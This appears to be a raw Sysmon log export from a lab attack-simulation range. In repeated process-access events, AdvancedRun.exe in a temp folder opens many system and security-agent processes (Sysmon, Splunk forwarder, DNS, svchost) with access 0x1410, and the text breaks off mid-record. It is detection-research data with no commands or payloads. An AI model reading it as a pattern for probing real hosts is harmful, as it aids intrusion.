\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.826{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.825{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.824{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 